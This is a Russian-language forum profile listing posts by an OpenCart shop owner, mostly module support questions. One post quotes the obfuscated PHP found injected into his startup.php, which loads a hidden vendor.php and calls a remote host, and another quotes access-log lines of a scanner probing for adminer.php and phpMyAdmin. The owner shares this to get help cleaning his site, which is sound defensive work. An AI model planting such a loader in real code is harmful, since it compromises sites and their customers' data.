maaby
-
Публікації
64 -
З нами
Тип публікації
Профілі
Форум
Маркетплейс
Статті
FAQ
Наші новини
Магазин
Блоги
module__dplus_manager
Усі публікації користувача maaby
-
Спасибо за предложение, я пока сам. Если закончатся идеи, тогда буду искать специалиста.
-
В этот раз не спешил и сделал скриншот изменений, которые сделал вирус.
-
Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23 Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его. Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)
-
Добрый день. Да. Спасибо, что указали мне на этот модуль. Не помню даже, зачем его ставил. Вы вырвали из контекста мою фразу. Самый лучший в РБ. Я понимаю, почему вы это пишите... Но я уже давно не живу в Беларуси, т.к. не согласен с тем, что происходит. Правда магазин еще там остался, работает, что-то зарабатывает и помогает оплачивать тут счета. Отказываться от того, что приносит хоть какой-то доп. доход, я не хочу, поймите меня правильно. Огромное спасибо за дельный совет! Надо было давно проверить логи, только я с перепуга всё стер, как только увидел Скорее всего ваш коллега выше уже нашел то, что я должен был обнаружить в логах. В общем, файл adminer.php лежит уже на сервере с 20го года. Но попытка загрузки сторонних файлов на сайт была только пару недель назад... Вот интересное еще в логах нашел. Стучались по следующим адресам: 109.196.163.71 - - [02/Jul/2024:09:47:21 +0300] "GET /composer.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:23 +0300] "GET /package.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:25 +0300] "GET /adminer.php HTTP/1.0" 200 4049 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:26 +0300] "GET /phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:29 +0300] "GET /phpMyAdmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:30 +0300] "GET /pma HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:32 +0300] "GET /myadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:34 +0300] "GET /dbadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:37 +0300] "GET /_phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" admirer.php как вы понимаете, был... Буду обновлять по мере появления новой инфы. Всем еще раз спасибо за наводки и советы.
-
Не должен, по крайней мере я надеюсь на это. Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок.
-
Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.
-
Хостинг в беларуси. Hoster.by, самый лучший, что у нас есть. 99% куплено на этом сайте. Может пару штук купил на opencart.com. Никаких помоек я точно не посещал и ничего из них не качал.
-
Добрый день сообщество. Столкнулся с такой проблемой. opencart 3, внесены изменения в файл startup.php Выглядит это так: <?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?> Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1); который скорее всего отправляет данные на https://startportal.top/info/ Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей. он дальше много чего подгружает. Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник... Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. vendor.php startup.php plugins.php dist.php english.php
-
Добрый день. Не подскажете, как можно сделать, чтобы в каталоге и на стр. товара звездочки аналогично, закрашивались частично, как в самом модуле. Сейчас звездочка либо целиком закрашена, либо нет. В самом модуле - работает все хорошо.
-
@Kostya150 Спасибо за решение. Все отлично работает.
-
Спасибо, все так и есть. Исправил. Моя ошибка в том, что я думал - это фильтр только для исключений, а если его не настраивать то автоматически подтягивается все.
-
-
Добрый день. Обновил модуль. Создал виджет, но при нажатии на обновление кэша выдает окошко с ошибкой:
-
Добрый день. Подскажите, планируется ли интеграция пользователей сайта с физ. лицами из 1с. К примеру у нас бонусная программа и люди регистрируются в магазине, получают бонусные баллы за покупку. Было бы интересно, синхронизировать клиентов (по уникальному полю - может номер телефона, а затем фамилии) между 1с и сайтом, а так-же их бонусные баллы (чтобы их можно было потратить в интернет магазине). Или может можно допилить индивидуально (вопрос цены).
-
@markimax Добрый день, писал в личку по поводу обновления и настройки модуля, как увидите - отпишитесь пожалуйста.
-
Не совсем так. Я обновлял модуль по тому, что фото не грузились. Но после обновления - ситуация не изменилась - 500 ошибка. Что касается админки - я всё поправил. А вот через форму - оставить отзыв о товаре на стр. продукта - вылетает 500 ошибка. UPD: Когда добавил поля в БД - 500 исчезла, отзыв добавляет. Но фото не появляется. review-media-container - пустой.
-
Это я уже решил (там выше было написано). Кстати, эта колонка, еще в одной таблице отсутствовала и еще + review_id, но такие проблемы решаются на раз, по ним логи есть. А вот 500 ошибка в зашифрованном файле - это мне не под силу.
-
UPD: решено! Добавил колонку типа varchar 255. Это у меня после обновления вылетело. Еще заметил, что в админке, на странице редактирования отзыва вылетает 500 ошибка. https://aloe.by/admin/index.php?route=catalog/extended_reviews/edit 12-Nov-2020 13:59:35 UTC] PHP Fatal error: Uncaught exception 'Exception' with message 'Error: Unknown column 'review_type' in 'where clause'<br />Error No: 1054<br />SELECT * FROM oc_review_image WHERE review_id = '223' and review_type = '0'' in /home/maaby/aloe.by/system/library/db/mysqli.php:40 Stack trace: #0 /home/maaby/aloe.by/system/library/db.php(45): DB\MySQLi->query('SELECT * FROM o...') #1 /home/maaby/aloe.by/admin/model/catalog/extended_reviews.php(76): DB->query('SELECT * FROM o...') #2 [internal function]: ModelCatalogExtendedReviews->getImagesByReviewId('223') #3 /home/maaby/aloe.by/aloe_storage/modification/system/engine/loader.php(251): call_user_func_array(Array, Array) #4 [internal function]: Loader->{closure}(Array, Array) #5 /home/maaby/aloe.by/system/engine/proxy.php(47): call_user_func_array(Object(Closure), Array) #6 /home/maaby/aloe.by/admin/controller/catalog/extended_reviews.php(954): Proxy->__call('getImagesByRevi...', Array) #7 /home/maaby/aloe.by/admin/controller/catalog/extended_reviews.php(954): Proxy->getImagesByReview in /home/maaby/aloe.by/system/library/db/mysqli.php on line 40
-
Добрый день. Сайт https://aloe.by Не грузятся изображения. При загрузке изображений 500 ошибка в методе write. Я бы и сам глянул, но там всё зашифровано. Что интересно, фото на сервак грузятся... Запрос с загрузкой файла проходит без проблем. Ошибка возникает уже после нажатия на кнопку "Отправка". Request URL: https://aloe.by/index.php?route=product/extended_reviews/write&product-id=532 Request Method: POST Status Code: 500 Remote Address: 93.125.99.60:443 Referrer Policy: strict-origin-when-cross-origin content-length: 0 content-type: text/html; charset=UTF-8 date: Thu, 12 Nov 2020 13:48:36 GMT server: nginx set-cookie: OCSESSID=25100b904af54559e30f89ffe3; expires=Thu, 19-Nov-2020 13:48:34 GMT; Max-Age=604800; path=/ set-cookie: OCSESSID=25100b904af54559e30f89ffe3; expires=Thu, 19-Nov-2020 13:48:34 GMT; Max-Age=604800; path=/ set-cookie: prmn_fias=324724; expires=Sat, 12-Dec-2020 13:48:34 GMT; Max-Age=2592000; path=/; domain=.aloe.by status: 500 x-powered-by: PHP/5.6.40 :authority: aloe.by :method: POST :path: /index.php?route=product/extended_reviews/write&product-id=532 :scheme: https accept: application/json, text/javascript, */*; q=0.01 accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9,ru;q=0.8 content-length: 155 content-type: application/x-www-form-urlencoded; charset=UTF-8 cookie: OCSESSID=25100b904af54559e30f89ffe3; language=ru-ru; _ym_uid=1601553003647477942; _ym_d=1601553003; prmn_confirm=1; _fbp=fb.1.1602604750677.90984833; prmn_fias=324724; currency=BYN; _gid=GA1.2.1755753083.1604578607; _ym_isad=2; PHPSESSID=c99qpv8q6vhe076buc3ollksf5; viewed_id=532%2C535%2C392%2C213%2C64%2C209%2C531%2C91; _gat=1; _dc_gtm_UA-51057748-5=1; _ga=GA1.1.518016932.1601553002; _ga_B2PM4BJKGJ=GS1.1.1605184520.19.1.1605188853.0 origin: https://aloe.by referer: https://aloe.by/uhod-za-licom/dlya-kozhi/kremy/aloe-99-soothing-gel-55-ml-holika-holika sec-fetch-dest: empty sec-fetch-mode: cors sec-fetch-site: same-origin user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 x-requested-with: XMLHttpRequest route: product/extended_reviews/write product-id: 532 rating: 5 plus: minus: text: супер name: Мазюк Алекс image_id: 26 video_links:
-
Добрый день. Исходные: - Сайт aloe.by - ocStore 3 - корзина: модуль simple + Filterit - управление доставкой и оплатой. В симплу были всунуты руки и не все там работает гладко. Но есть гит и можно отследить изменения. - модуль retailCrm. Синхронизируется, но не все поля. email и доставки не синхронизируются, это из того, что заметил. Что надо сделать (в общих чертах):Корзина. Предыдущие разработчики оставили много технического долга и изменили стандартные поля. В результате, синхронизация с ритеилЦРМ, работает частично, а варианты доставки из коробки вообще с симплой не работали изначально (знаю, что эту задачу уже решали на форуме). 1. был сделан упрощенный хедер \ футер. В результате появились файлы simple_header.twig в которые тупо, без переменных вбиты ссылки на скрипты, текст (о локализации явно никто не заботился) и прочие косяки. Я молчу про тупое дублирование и необходимость вносить изменения в несколько мест. Если получится за адекватное время сделать рефакторинг, то доработаем, если нет, вернем стандартные. 2. В корзине в верхней части оставляем вариант оформления заказа без регистрации (сейчас кнопки регулируют кол-во полей), но оставим кнопку войти (она открывает попап с данными для входа и возможностью зарегиться).
-
Есть предложение / пожелание по развитию модуля: Добавить условие: назначать количество ББ от суммы покупки (для каждой из групп пользователей). Пример: Если клиент купил на сумму меньше 10$ ему назначается 3% от суммы покупки бонусными баллами. Если он добавил еще что-то в корзину до 20$ клиенту уже назначается 4% бонусами. Больше 30$ - 6% вернется бонусами. Думаю, такой функционал позволит увеличить средний чек и будет мотивировать клиента купить больше.
-
Мда... Лучше бы я не трогал. Теперь версия откатилась назад на 15.9 и он вообще перестал работать. Сколько стоит, чтобы вы обновили?
-
Как я понял, простого пути нет, надо полностью деинсталировать, потом установить заново? От сюда важный вопрос, а настройки, что вы сделали, не слетят? Я так потом сам не настрою.
-
Обновил (через админку) - Главная -> Установка / обновление. Но по моему, это не помогло. Версия 16.6
-
Добрый день. Можно ли изменить генерируемые названия файлов кэша? Дело в том, что браузер его закэшировал себе, а я внес изменения на сайт. Браузер упорно считает, что ничего не изменилось. Даже если обновить весь кэш, то названия остаются прежними и браузер не выкачивает их с сервера заново.
